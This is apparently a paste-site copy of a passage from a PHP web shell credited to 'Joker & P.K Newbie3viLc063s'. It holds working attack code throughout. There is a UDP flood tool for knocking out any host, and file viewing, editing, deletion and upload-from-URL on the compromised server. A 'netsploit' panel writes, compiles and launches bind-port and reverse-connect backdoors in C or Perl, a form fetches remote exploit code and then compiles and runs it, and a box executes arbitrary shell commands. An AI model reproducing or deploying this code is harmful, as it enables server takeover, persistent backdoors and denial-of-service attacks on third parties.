  2167. if(isset($_GET['host'])&&isset($_GET['time']))
  2168. {
  2169. $packets = 0;
  2170. ignore_user_abort(TRUE);
  2171. set_time_limit(0);
  2172.  
  2173. $exec_time = $_GET['time'];
  2174.  
  2175. $time = time();
  2176. //print "Started: ".time('d-m-y h:i:s')."<br>";
  2177. $max_time = $time+$exec_time;
  2178.  
  2179. $host = $_GET['host'];
  2180.  
  2181. for($i=0;$i<65000;$i++){
  2182. $out .= 'X';
  2183. }
  2184.  
  2185. while(1){
  2186. $packets++;
  2187. if(time() > $max_time){ break; }
  2188. $rand = rand(1,65000);
  2189. $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  2190. if($fp){
  2191. fwrite($fp, $out);
  2192. fclose($fp);
  2193. }
  2194. }
  2195.  
  2196. echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  2197. echo '<br><br>
  2198. <form action="'.$surl.'" method=GET>
  2199. <input type="hidden" name="act" value="phptools">
  2200. Host: <br><input type=text name=host><br>
  2201. Length (seconds): <br><input type=text name=time><br>
  2202. <input type=submit value=Go>
  2203. </form>';
  2204. }
  2205. else
  2206. {
  2207. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  2208. <table class="tabnet" style="width:300px;">
  2209. <tr>
  2210. <th colspan="2">UDP Flood</th>
  2211. </tr>
  2212. <tr>
  2213. <td>&nbsp;&nbsp;Host</td>
  2214. <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  2215. </tr>
  2216. <tr>
  2217. <td>&nbsp;&nbsp;Length (seconds)</td>
  2218. <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  2219. </tr>
  2220. <tr>
  2221. <td><input style="width:100%;" class="inputzbut" type="submit" value="Go" /></td>
  2222. </tr>
  2223. </table>
  2224. </center>';
  2225. }
  2226. }
  2227.  
  2228.  
  2229. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo'))
  2230. {
  2231. @ob_start();
  2232. @eval("phpinfo();");
  2233. $buff = @ob_get_contents();
  2234. @ob_end_clean();
  2235. $awal = strpos($buff,"<body>")+6;
  2236. $akhir = strpos($buff,"</body>");
  2237. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  2238. }
  2239.  
  2240. elseif(isset($_GET['view']) && ($_GET['view'] != ""))
  2241. {
  2242. if(is_file($_GET['view']))
  2243. {
  2244. if(!isset($file)) $file = magicboom($_GET['view']);
  2245. if(!$win && $posix)
  2246. {
  2247. $name=@posix_getpwuid(@fileowner($file));
  2248. $group=@posix_getgrgid(@filegroup($file));
  2249. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  2250. }
  2251. else { $owner = $user; }
  2252. $filn = basename($file);
  2253. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  2254. <tr>
  2255. <td>Filename</td>
  2256. <td>
  2257. <span id=\"".clearspace($filn)."_link\">".$file."</span>
  2258. <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2259. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  2260. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  2261. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  2262. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  2263. onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  2264. </form>
  2265. </td>
  2266. </tr>
  2267. <tr>
  2268. <td>Size</td>
  2269. <td>".ukuran($file)."</td>
  2270. </tr>
  2271. <tr>
  2272. <td>Permission</td>
  2273. <td>".get_perms($file)."</td>
  2274. </tr>
  2275. <tr>
  2276. <td>Owner</td>
  2277. <td>".$owner."</td>
  2278. </tr>
  2279. <tr>
  2280. <td>Create time</td>
  2281. <td>".date("d-M-Y H:i",@filectime($file))."</td>
  2282. </tr>
  2283. <tr>
  2284. <td>Last modified</td>
  2285. <td>".date("d-M-Y H:i",@filemtime($file))."</td>
  2286. </tr>
  2287. <tr>
  2288. <td>Last accessed</td>
  2289. <td>".date("d-M-Y H:i",@fileatime($file))."</td>
  2290. </tr>
  2291. <tr>
  2292. <td>Actions</td>
  2293. <td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
  2294. | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
  2295. | <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
  2296. | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
  2297. </td>
  2298. </tr>
  2299. <tr>
  2300. <td>View</td>
  2301. <td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a>
  2302. | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a>
  2303. | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">img</a>
  2304. </td>
  2305. </tr>
  2306. </table> ";
  2307. if(isset($_GET['type']) && ($_GET['type']=='image'))
  2308. { echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; }
  2309. elseif(isset($_GET['type']) && ($_GET['type']=='code'))
  2310. { echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; }
  2311. else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; }
  2312. }
  2313. elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); }
  2314. }
  2315.  
  2316. elseif(isset($_GET['edit']) && ($_GET['edit'] != ""))
  2317. {
  2318. if(isset($_POST['save']))
  2319. {
  2320. $file = $_POST['saveas'];
  2321. $content = magicboom($_POST['content']);
  2322. if($filez = @fopen($file,"w"))
  2323. {
  2324. $time = date("d-M-Y H:i",time());
  2325. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  2326. else $msg = "failed to save"; @fclose($filez);
  2327. }
  2328. else $msg = "permission denied";
  2329. }
  2330. if(!isset($file)) $file = $_GET['edit'];
  2331. if($filez = @fopen($file,"r"))
  2332. {
  2333. $content = "";
  2334. while(!feof($filez))
  2335. {
  2336. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  2337. }
  2338. @fclose($filez);
  2339. } ?>
  2340. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  2341. <table class="cmdbox">
  2342. <tr>
  2343. <td colspan="2">
  2344. <textarea class="output" name="content"> <?php echo $content; ?> </textarea>
  2345. </td>
  2346. <tr>
  2347. <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  2348. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?>
  2349. </td>
  2350. </tr>
  2351. </table>
  2352. </form>
  2353. <?php
  2354. }
  2355.  
  2356. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload'))
  2357. {
  2358. if(isset($_POST['uploadcomp']))
  2359. {
  2360. if(is_uploaded_file($_FILES['file']['tmp_name']))
  2361. {
  2362. $path = magicboom($_POST['path']);
  2363. $fname = $_FILES['file']['name'];
  2364. $tmp_name = $_FILES['file']['tmp_name'];
  2365. $pindah = $path.$fname;
  2366. $stat = @move_uploaded_file($tmp_name,$pindah);
  2367. if ($stat) { $msg = "file uploaded to $pindah"; }
  2368. else $msg = "failed to upload $fname";
  2369. }
  2370. else $msg = "failed to upload $fname";
  2371. }
  2372. elseif(isset($_POST['uploadurl']))
  2373. {
  2374. $pilihan = trim($_POST['pilihan']);
  2375. $wurl = trim($_POST['wurl']);
  2376. $path = magicboom($_POST['path']);
  2377. $namafile = download($pilihan,$wurl);
  2378. $pindah = $path.$namafile;
  2379. if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
  2380. else $msg = "failed ! to upload $namafile"; }
  2381. ?>
  2382. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  2383. <table class="tabnet" style="width:320px;padding:0 1px;">
  2384. <tr>
  2385. <th colspan="2">Upload from computer</th>
  2386. </tr>
  2387. <tr>
  2388. <td colspan="2">
  2389. <p style="text-align:center;">
  2390. <input style="color:#000000;" type="file" name="file" />
  2391. <input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;">
  2392. </p>
  2393. </td>
  2394. </tr>
  2395. <tr>
  2396. <td colspan="2">
  2397. <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" />
  2398. </td>
  2399. </tr>
  2400. </table>
  2401. </form>
  2402. <table class="tabnet" style="width:320px;padding:0 1px;">
  2403. <tr>
  2404. <th colspan="2">Upload from url</th>
  2405. </tr>
  2406. <tr>
  2407. <td colspan="2">
  2408. <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  2409. <table>
  2410. <tr>
  2411. <td>url</td>
  2412. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td>
  2413. </tr>
  2414. <tr>
  2415. <td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
  2416. </tr>
  2417. <tr>
  2418. <td>
  2419. <select size="1" class="inputz" name="pilihan">
  2420. <option value="wwget">wget</option>
  2421. <option value="wlynx">lynx</option>
  2422. <option value="wfread">fread</option>
  2423. <option value="wfetch">fetch</option>
  2424. <option value="wlinks">links</option>
  2425. <option value="wget">GET</option>
  2426. <option value="wcurl">curl</option>
  2427. </select>
  2428. </td>
  2429. <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td>
  2430. </tr>
  2431. </table>
  2432. </form>
  2433. </td>
  2434. </tr>
  2435. </table>
  2436. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  2437. <?php }
  2438.  
  2439. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
  2440. {
  2441. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  2442. {
  2443. $port = trim($_POST['port']);
  2444. $passwrd = trim($_POST['bind_pass']);
  2445. tulis("bdc.c",$port_bind_bd_c);
  2446. exe("gcc -o bdc bdc.c");
  2447. exe("chmod 777 bdc");
  2448. @unlink("bdc.c");
  2449. exe("./bdc ".$port." ".$passwrd." &");
  2450. $scan = exe("ps aux");
  2451. if(eregi("./bdc $por",$scan))
  2452. {
  2453. $msg = "<p>Process found running, backdoor setup successfully.</p>";
  2454. }
  2455. else
  2456. {
  2457. $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  2458. }
  2459. }
  2460. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  2461. {
  2462. $port = trim($_POST['port']);
  2463. $passwrd = trim($_POST['bind_pass']);
  2464. tulis("bdp",$port_bind_bd_pl);
  2465. exe("chmod 777 bdp");
  2466. $p2=which("perl");
  2467. exe($p2." bdp ".$port." &");
  2468. $scan = exe("ps aux");
  2469. if(eregi("$p2 bdp $port",$scan))
  2470. { $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  2471. else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
  2472. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  2473. {
  2474. $ip = trim($_POST['ip']);
  2475. $port = trim($_POST['backport']);
  2476. tulis("bcc.c",$back_connect_c);
  2477. exe("gcc -o bcc bcc.c");
  2478. exe("chmod 777 bcc");
  2479. @unlink("bcc.c");
  2480. exe("./bcc ".$ip." ".$port." &");
  2481. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2482. }
  2483. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  2484. {
  2485. $ip = trim($_POST['ip']);
  2486. $port = trim($_POST['backport']);
  2487. tulis("bcp",$back_connect);
  2488. exe("chmod +x bcp");
  2489. $p2=which("perl");
  2490. exe($p2." bcp ".$ip." ".$port." &");
  2491. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2492. }
  2493. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  2494. {
  2495. $pilihan = trim($_POST['pilihan']);
  2496. $wurl = trim($_POST['wurl']);
  2497. $namafile = download($pilihan,$wurl);
  2498. if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; }
  2499. ?>
  2500. <table class="tabnet">
  2501. <tr>
  2502. <th>Port Binding</th>
  2503. <th>Connect Back</th>
  2504. <th>Load and Exploit</th>
  2505. </tr>
  2506. <tr>
  2507. <td>
  2508. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  2509. <table>
  2510. <tr>
  2511. <td>Port</td>
  2512. <td>
  2513. <input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>">
  2514. </td>
  2515. </tr>
  2516. <tr>
  2517. <td>Password</td>
  2518. <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td>
  2519. </tr>
  2520. <tr>
  2521. <td>Use</td>
  2522. <td style="text-align:justify">
  2523. <p>
  2524. <select class="inputz" size="1" name="use">
  2525. <option value="Perl">Perl</option>
  2526. <option value="C">C</option>
  2527. </select>
  2528. <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
  2529. </td>
  2530. </tr>
  2531. </table>
  2532. </form>
  2533. </td>
  2534. <td>
  2535. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  2536. <table>
  2537. <tr>
  2538. <td>IP</td>
  2539. <td>
  2540. <input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
  2541. </td>
  2542. </tr>
  2543. <tr>
  2544. <td>Port</td>
  2545. <td>
  2546. <input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>">
  2547. </td>
  2548. </tr>
  2549. <tr>
  2550. <td>Use</td>
  2551. <td style="text-align:justify">
  2552. <p>
  2553. <select size="1" class="inputz" name="use">
  2554. <option value="Perl">Perl</option>
  2555. <option value="C">C</option>
  2556. </select>
  2557. <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
  2558. </td>
  2559. </tr>
  2560. </table>
  2561. </form>
  2562. </td>
  2563. <td>
  2564. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  2565. <table>
  2566. <tr>
  2567. <td>url</td>
  2568. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
  2569. </tr>
  2570. <tr>
  2571. <td>cmd</td>
  2572. <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  2573. </tr>
  2574. <tr>
  2575. <td>
  2576. <select size="1" class="inputz" name="pilihan">
  2577. <option value="wwget">wget</option>
  2578. <option value="wlynx">lynx</option>
  2579. <option value="wfread">fread</option>
  2580. <option value="wfetch">fetch</option>
  2581. <option value="wlinks">links</option>
  2582. <option value="wget">GET</option>
  2583. <option value="wcurl">curl</option>
  2584. </select>
  2585. </td>
  2586. <td colspan="2">
  2587. <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
  2588. </td>
  2589. </tr>
  2590. </table>
  2591. </form>
  2592. </td>
  2593. </tr>
  2594. </table>
  2595. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  2596. <?php }
  2597.  
  2598. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
  2599. {
  2600. ?>
  2601. <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  2602. <table class="cmdbox">
  2603. <tr>
  2604. <td colspan="2">
  2605. <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  2606. </td>
  2607. </tr>
  2608. <tr>
  2609. <td colspan="2"><?php echo $prompt; ?>
  2610. <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
  2611. <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
  2612. </td>
  2613. </tr>
  2614. </table>
  2615. </form> <?php
  2616. }
  2617. else
  2618. {
  2619. if(isset($_GET['delete']) && ($_GET['delete'] != ""))
  2620. {
  2621. $file = $_GET['delete']; @unlink($file);
  2622. }
  2623. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
  2624. {
  2625. @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  2626. }
  2627. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
  2628. {
  2629. $path = $pwd.$_GET['mkdir']; @mkdir($path);
  2630. }
  2631. $buff = showdir($pwd,$prompt);
  2632. echo $buff;
  2633. }
  2634. ?>
  2635. <center><br><br><br><br>
  2636. Coded by Joker & P.K Newbie3viLc063s 2010-2012</br>
  2637. Mod by Altenator IWnet <img src='http://l.yimg.com/a/i/us/msg/emoticons/pirate_2.gif' /><br>
  2638. </center>
  2639.  
  2640. </div>
  2641. </body>
  2642. </html>
Add Comment
Please, Sign In to add comment